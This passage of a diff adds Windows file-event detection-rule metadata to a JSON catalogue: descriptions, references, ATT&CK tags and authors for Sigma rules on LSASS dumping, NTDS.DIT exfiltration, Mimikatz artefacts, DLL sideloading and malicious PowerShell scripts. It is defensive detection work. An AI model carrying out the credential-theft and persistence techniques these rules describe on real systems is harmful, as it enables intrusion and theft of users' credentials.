"author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Files that accidentally contain these strings" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", + "uuid": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "value": "NPPSpy Hacktool Usage", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy", + "https://twitter.com/0gtweet/status/1465282548494487554", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml" + ], + "tags": [ + "attack.credential_access" + ], + "creation_date": "2021/11/29", + "filename": "file_event_win_hktl_nppspy.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.", + "uuid": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", + "value": "Potential Initial Access via DLL Search Order Hijacking", + "meta": { + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc", + "https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml" + ], + "tags": [ + "attack.t1566", + "attack.t1566.001", + "attack.initial_access", + "attack.t1574", + "attack.t1574.001", + "attack.defense_evasion" + ], + "creation_date": "2022/10/21", + "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml", + "author": "Tim Rauch (rule), Elastic (idea)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "TeamViewer_Desktop.exe is create during install", + "uuid": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", + "value": "Installation of TeamViewer Desktop", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-1---teamviewer-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_install_teamviewer_desktop.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/01/28", + "filename": "file_event_win_install_teamviewer_desktop.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the presence and execution of Inveigh via dropped artefacts", + "uuid": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "value": "Inveigh Execution Artefacts", + "meta": { + "refs": [ + "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs", + "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs", + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_inveigh_artefacts.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/10/24", + "filename": "file_event_win_inveigh_artefacts.yml", + "author": "Nasreddine Bencherchali", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (\u201ciphlpapi.dll\u201d) is sideloaded\n", + "uuid": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "value": "Malicious DLL File Dropped in the Teams or OneDrive Folder", + "meta": { + "refs": [ + "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2022/08/12", + "filename": "file_event_win_iphlpapi_dll_sideloading.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", + "uuid": "2f9356ae-bf43-41b8-b858-4496d83b2acb", + "value": "ISO File Created Within Temp Folders", + "meta": { + "refs": [ + "https://twitter.com/Sam0x90/status/1552011547974696960", + "https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_mount.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ], + "creation_date": "2022/07/30", + "filename": "file_event_win_iso_file_mount.yml", + "author": "@sam0x90", + "level": "high", + "falsepositive": [ + "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", + "uuid": "4358e5a5-7542-4dcb-b9f3-87667371839b", + "value": "ISO or Image Mount Indicator in Recent Files", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", + "https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/", + "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_recent.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/11", + "filename": "file_event_win_iso_file_recent.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Cases in which a user mounts an image file for legitimate reasons" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects programs on a Windows system that should not write an archive to disk", + "uuid": "654fcc6d-840d-4844-9b07-2c3300e54a26", + "value": "Legitimate Application Dropped Archive", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_archive.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/08/21", + "filename": "file_event_win_legitimate_app_dropping_archive.yml", + "author": "frack113, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects programs on a Windows system that should not write executables to disk", + "uuid": "f0540f7e-2db3-4432-b9e0-3965486744bc", + "value": "Legitimate Application Dropped Executable", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_exe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/08/21", + "filename": "file_event_win_legitimate_app_dropping_exe.yml", + "author": "frack113, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects programs on a Windows system that should not write scripts to disk", + "uuid": "7d604714-e071-49ff-8726-edeb95a70679", + "value": "Legitimate Application Dropped Script", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_script.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/08/21", + "filename": "file_event_win_legitimate_app_dropping_script.yml", + "author": "frack113, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", + "uuid": "a5a2d357-1ab8-4675-a967-ef9990a59391", + "value": "LSASS Process Memory Dump Files", + "meta": { + "refs": [ + "https://www.google.com/search?q=procdump+lsass", + "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", + "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", + "https://github.com/helpsystems/nanodump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2021/11/15", + "filename": "file_event_win_lsass_dump.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", + "uuid": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", + "value": "LSASS Memory Dump File Creation", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_memory_dump_file_creation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2019/10/22", + "filename": "file_event_win_lsass_memory_dump_file_creation.yml", + "author": "Teymur Kheirkhabarov, oscd.community", + "level": "high", + "falsepositive": [ + "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", + "Dumps of another process that contains lsass in its process name (substring)" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", + "uuid": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", + "value": "WerFault LSASS Process Memory Dump", + "meta": { + "refs": [ + "https://github.com/helpsystems/nanodump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2022/06/27", + "filename": "file_event_win_lsass_werfault_dump.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "A office file with macro is created from a commandline or a script", + "uuid": "b1c50487-1967-4315-a026-6491686d860e", + "value": "Dump Office Macro Files from Commandline", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md", + "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_macro_file.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ], + "creation_date": "2022/01/23", + "filename": "file_event_win_macro_file.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "uuid": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "value": "Adwind RAT / JRAT File Artifact", + "meta": { + "refs": [ + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_adwind.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ], + "creation_date": "2017/11/10", + "filename": "file_event_win_mal_adwind.yml", + "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects Octopus Scanner Malware.", + "uuid": "805c55d9-31e6-4846-9878-c34c75054fe9", + "value": "Octopus Scanner Malware", + "meta": { + "refs": [ + "https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_octopus_scanner.yml" + ], + "tags": [ + "attack.t1195", + "attack.t1195.001" + ], + "creation_date": "2020/06/09", + "filename": "file_event_win_mal_octopus_scanner.yml", + "author": "NVISO", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Malware can use mountable Virtual Hard Disk .vhd file to encapsulate payloads and evade security controls", + "uuid": "8468111a-ef07-4654-903b-b863a80bbc95", + "value": "Suspicious VHD Image Download From Browser", + "meta": { + "refs": [ + "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", + "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_vhd_download.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ], + "creation_date": "2021/10/25", + "filename": "file_event_win_mal_vhd_download.yml", + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "level": "medium", + "falsepositive": [ + "Legitimate user creation" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of files that contain Kerberos tickets based on an extension used by the popular tool Mimikatz", + "uuid": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "value": "Mimikatz Kirbi File Creation", + "meta": { + "refs": [ + "https://cobalt.io/blog/kerberoast-attack-techniques", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mimikatz_kirbi_file_creation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558" + ], + "creation_date": "2021/11/08", + "filename": "file_event_win_mimikatz_kirbi_file_creation.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects Mimikatz MemSSP default log file creation", + "uuid": "034affe8-6170-11ec-844f-0f78aa0c4d66", + "value": "Mimikatz MemSSP Default Log File Creation", + "meta": { + "refs": [ + "https://pentestlab.blog/2019/10/21/persistence-security-support-provider/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mimimaktz_memssp_log_file.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "creation_date": "2021/12/20", + "filename": "file_event_win_mimimaktz_memssp_log_file.yml", + "author": "David ANDRE", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "uuid": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "value": "Moriya Rootkit", + "meta": { + "refs": [ + "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_moriya_rootkit.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2021/05/06", + "filename": "file_event_win_moriya_rootkit.yml", + "author": "Bhabesh Raj", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects msdt.exe creating files in suspicious directories", + "uuid": "318557a5-150c-4c8d-b70e-a9910e199857", + "value": "MSDT.exe Creates Files in Autorun Directory", + "meta": { + "refs": [ + "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", + "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_msdt_autorun.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001", + "cve.2022.30190" + ], + "creation_date": "2022/08/24", + "filename": "file_event_win_msdt_autorun.yml", + "author": "Vadim Varganov, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context", + "uuid": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", + "value": "NET CLR Binary Execution Usage Log Artifact", + "meta": { + "refs": [ + "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", + "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/11/18", + "filename": "file_event_win_net_cli_artefact.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", + "uuid": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", + "value": "Creation Suspicious File In Uncommon AppData Folder", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ], + "creation_date": "2022/08/05", + "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "An attacker may execute an application as a .SCR File (Screensaver) using rundll32.exe desk.cpl,InstallScreenSaver", + "uuid": "c048f047-7e2a-4888-b302-55f509d4a91d", + "value": "SCR File Write Event", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Desk/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_src_file.yml" + ], + "tags": [ + "attack.t1218.011", + "attack.defense_evasion" + ], + "creation_date": "2022/04/27", + "filename": "file_event_win_new_src_file.yml", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "level": "medium", + "falsepositive": [ + "The installation of new screen savers." + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". Which could indicates possible persistence", + "uuid": "54127bd4-f541-4ac3-afdb-ea073f63f692", + "value": "Persistence Via Notepad++ Plugins", + "meta": { + "refs": [ + "https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/06/10", + "filename": "file_event_win_notepad_plus_plus_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Possible FPs during first installation of Notepad++", + "Legitimate use of custom plugins to enhance notepad++ functionality by users" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious creations of a file named ntds.dit, e.g. by a PowerShell parent or in a suspicious directory or a suspicious one liner", + "uuid": "4e7050dd-e548-483f-b7d6-527ab4fa784d", + "value": "Suspicious NTDS.DIT Creation", + "meta": { + "refs": [ + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", + "https://pentestlab.blog/tag/ntds-dit/", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ], + "creation_date": "2022/03/11", + "filename": "file_event_win_ntds_dit.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", + "uuid": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", + "value": "Suspicious NTDS Exfil Filename Patterns", + "meta": { + "refs": [ + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb", + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1", + "https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ], + "creation_date": "2022/03/11", + "filename": "file_event_win_ntds_exfil_tools.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects add-ins that load when Microsoft Word or Excel starts (.wll/.xll are simply .dll fit for Word or Excel).", + "uuid": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", + "value": "Microsoft Office Add-In Loading", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137.006" + ], + "creation_date": "2020/05/11", + "filename": "file_event_win_office_persistence.yml", + "author": "NVISO", + "level": "high", + "falsepositive": [ + "Legitimate add-ins" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a macro file for Outlook.\nGoes with win_outlook_c2_registry_key. VbaProject.OTM is explicitly mentioned in T1137.\nParticularly interesting if both events Registry & File Creation happens at the same time.\n", + "uuid": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", + "value": "Outlook C2 Macro Creation", + "meta": { + "refs": [ + "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_outlook_c2_macro_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ], + "creation_date": "2021/04/05", + "filename": "file_event_win_outlook_c2_macro_creation.yml", + "author": "@ScoubiMtl", + "level": "medium", + "falsepositive": [ + "User genuinly creates a VB Macro for their email" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of new Outlook form which can contain malicious code", + "uuid": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "value": "Outlook Form Installation", + "meta": { + "refs": [ + "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_outlook_newform.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137.003" + ], + "creation_date": "2021/06/10", + "filename": "file_event_win_outlook_newform.yml", + "author": "Tobias Michalski", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects processes creating temp files related to PCRE.NET package", + "uuid": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "value": "PCRE.NET Package Temp Files", + "meta": { + "refs": [ + "https://twitter.com/rbmaslen/status/1321859647091970051", + "https://twitter.com/tifkin_/status/1321916444557365248", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pcre_net_temp_file.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2020/10/29", + "filename": "file_event_win_pcre_net_temp_file.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "uuid": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", + "value": "Pingback Backdoor - File", + "meta": { + "refs": [ + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", + "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pingback_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.001" + ], + "creation_date": "2021/05/05", + "filename": "file_event_win_pingback_backdoor.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Very unlikely" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of known powershell scripts for exploitation", + "uuid": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "value": "Malicious PowerShell Commandlet Names", + "meta": { + "refs": [ + "https://raw.githubusercontent.com/Neo23x0/sigma/f35c50049fa896dff91ff545cb199319172701e8/rules/windows/powershell/powershell_malicious_commandlets.yml", + "https://github.com/PowerShellMafia/PowerSploit", + "https://github.com/NetSPI/PowerUpSQL", + "https://github.com/CsEnox/EventViewer-UACBypass", + "https://github.com/AlsidOfficial/WSUSpendu/", + "https://github.com/nettitude/Invoke-PowerThIEf", + "https://github.com/S3cur3Th1sSh1t/WinPwn", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2018/04/07", + "filename": "file_event_win_powershell_exploit_scripts.yml", + "author": "Markus Neis, Nasreddine Bencherchali, Mustafa Kaan Demir, Georg Lauenstein", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Attempts to detect PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", + "uuid": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", + "value": "PowerShell Writing Startup Shortcuts", + "meta": { + "refs": [ + "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_startup_shortcuts.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2021/10/24", + "filename": "file_event_win_powershell_startup_shortcuts.yml", + "author": "Christopher Peacock '@securepeacock', SCYTHE", + "level": "high", + "falsepositive": [ + "Unknown", + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects a dump file 